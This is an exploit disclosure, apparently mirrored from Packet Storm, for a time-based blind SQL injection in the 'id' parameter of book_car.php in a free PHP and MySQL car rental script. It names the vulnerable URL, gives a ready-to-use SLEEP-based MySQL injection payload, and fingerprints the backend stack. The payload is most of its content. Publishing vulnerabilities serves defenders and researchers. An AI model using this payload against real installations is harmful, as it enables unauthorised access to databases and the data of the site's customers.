Exploit for Car Rental Script SQL Injection

## https://sploitus.com/exploit?id=PACKETSTORM:158856
====================================================================  
Car Rental Script - Time-based blind SQL injection  
====================================================================  
####################################################################  
.:. Author : Yussef Dajdaj  
.:. Contact :  
.:. Vendor : https://projectworlds.in/  
.:. Script : https://projectworlds.in/free-projects/php-projects/car-rental-project-in-php-and-mysql/  
.:. Date: : 8/8/2020  
.:. Tested on: : Tested on: Window 10 64 bit environment || XAMPP  
####################################################################  
  
  
===[ Exploit ]===  
  
[*] SQL injection  
=================================  
  
https://localhost/testing/book_car.php?id='[payload<https://localhost/testing/book_car.php?id='%5bpayload>]  
  
  
Parameter: id (GET)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: id=' AND (SELECT 4182 FROM (SELECT(SLEEP(5)))dQXQ) AND 'CYlu'='CYlu  
  
  
the back-end DBMS is MySQL, web application technology: PHP 7.2.32, PHP, Apache 2.4.43